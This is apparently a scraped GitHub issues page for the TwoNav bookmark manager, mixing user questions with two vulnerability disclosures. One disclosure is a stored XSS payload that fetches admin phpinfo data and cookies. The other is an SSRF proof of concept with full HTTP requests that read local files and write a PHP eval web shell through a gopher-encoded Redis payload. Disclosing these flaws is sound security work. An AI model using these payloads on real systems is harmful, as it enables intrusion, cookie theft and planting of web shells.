tznb1 / twonav Goto Github PK
View Code? Open in Web Editor NEWTwoNav 第二代云导航|云书签管理系统
Home Page: https://two.lm21.top
License: GNU General Public License v3.0
TwoNav 第二代云导航|云书签管理系统
Home Page: https://two.lm21.top
License: GNU General Public License v3.0
因为有做英文站的需求,所以请问下后台设置中是否有修改成英文界面的选项呢。
我在后台查找了一番,并没有找到修改成英文界面的选项。
Vulnerability Product:TwoNav v2.0.28-20230624
Vulnerability version: v2.0.28-20230624
Vulnerability type: Stored XSS
Vulnerability Details:
Vulnerability location:add header 、"/index.php?c=api&method=read_data&type=phpinfo&u=admin"
The default settings allowing free register, causes stored XSS
the Stored XSS payload could let admin call phpinfo(); and bypassing the http-only , causes disclosure of cookies、root path of websites、variables of PHP and stuff
firstly , register an account at http://localhost/?c=login,
account : test
password : test
then go to "站点设置",
because of the http-only, you need to let admin call phpinfo(), the api is this : http://localhost/index.php?c=api&method=read_data&type=phpinfo&u=admin
enter the payload at the input of "头部(header)代码 - 用户", :
payload:
<script src="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
<script>
$.ajax({
url: '/index.php?c=api&method=read_data&type=phpinfo&u=admin',
type: 'get',
success: function (data) {
console.log(data);
}
})
</script>
after it , when an admin enter the page "http://localhost/?u=test", the page will automatically get phpinfo and call console.log() print it
(Certainly you can update the payload to send phpinfo to your server, console log is a test)
finally ,we download phpinfo and open it in html ,
here is large number of cookies was disclosed, and root path of website
proved Stored XSS
discovered by leeya_bug
如题,arm设备功耗比x86设备小很多,更适合长期挂载这类导航程序。
arm设备 50元/个,5w/h
x86设备 200起步,50w/h
使用webstack-hugo主题是必须授权后才能使用?
腾讯云服务器 mysql5.7,网页能打开,但安装不了,提示“保存配置失败”
Vulnerability Product: TwoNav v2.1.13-20240321
Vulnerability version: v2.1.13-20240321
Vulnerability type: SSRF
Vulnerability location: system\api.php
When using the TwoNav, I discovered a SSRF vulnerability in the '站长工具'->'连通测试'
I can use this vulnerability to detect internal network information or more
Given the following snippet:
function read_data(){
global $USER_DB;
//指定类型限制仅root账号可用!
if($USER_DB['UserGroup'] != 'root' && in_array( $_GET['type'],['diagnostic_log','connectivity_test','phpinfo'])){
msg(-1,'无权限');
}
//概要数据统计
if($_GET['type'] == 'home'){
$category_count = count_db('user_categorys',['uid'=>UID])??0;
$link_count = count_db('user_links',['uid'=>UID])??0;
$index_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'index_Ym'])??0;
$click_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'click_Ym'])??0;
msgA( ['code'=>1,'data'=>[$category_count,$link_count,$index_count,$click_count] ]);
//连通测试
}elseif($_GET['type'] == 'connectivity_test'){
if($GLOBALS['global_config']['offline'] == '1'){
msg(1,'您已开启离线模式,无法使用该功能!');
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['url']);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$start = microtime(true);
$response = curl_exec($ch);
$end = microtime(true);
$time = round(($end - $start) * 1000, 2);
if(curl_errno($ch)) {
$log .= "请求发生错误:".curl_error($ch);
} else {
$log .= "响应内容:".$response ?? 'Null' ;
$log .= ",访问耗时:{$time} 毫秒。" ;
}
curl_close($ch);
msg(1,$log);
Firstly, log in to the backend as an administrator.
Visit http://localhost/index.php?c=admin&u=admin#root/tool.
Click on '站长工具'->'连通测试', use Burp Suite to capture packets, and modify the packet data.
Through testing, I have discovered various exploits including but not limited to:
Read any file through the file protocol
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 19
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: TwoNavSID=mjehh1692q6k2m13345op8ljr5; admin_key=2da422eacc04d523b4732337fc682a70
Connection: close
url=file:///D:/flag
Detecting ports through the dict protocol
Write a shell through the gopher protocol(if the server has Redis installed).
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 662
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: db_type=mysql; TwoNav_initial=83r8q51c605fflp84i1ibsb6qi; admin_key=66495a9c3f40439d250286a81f4aa1dc; TwoNavSID=o8ckle5vgsfhuu4l2gq0so8e11
Connection: close
url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527xxx%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252427%250D%250AD%253A%255Cenv%255Cphp%255Cphpstudy_pro%255CWWW%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A=
RT
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.